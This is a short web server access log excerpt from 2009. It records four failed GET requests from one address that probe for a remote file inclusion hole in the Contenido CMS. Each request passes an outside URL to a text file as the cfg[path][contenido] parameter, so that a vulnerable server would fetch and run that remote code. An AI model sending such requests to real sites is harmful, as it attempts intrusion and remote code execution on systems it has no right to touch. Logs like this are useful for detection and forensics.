89.16.176.26 - - [27/Jun/2009:13:25:36 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.16.176.26 - - [27/Jun/2009:13:25:36 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
89.16.176.26 - - [27/Jun/2009:13:25:36 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
89.16.176.26 - - [27/Jun/2009:13:25:46 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
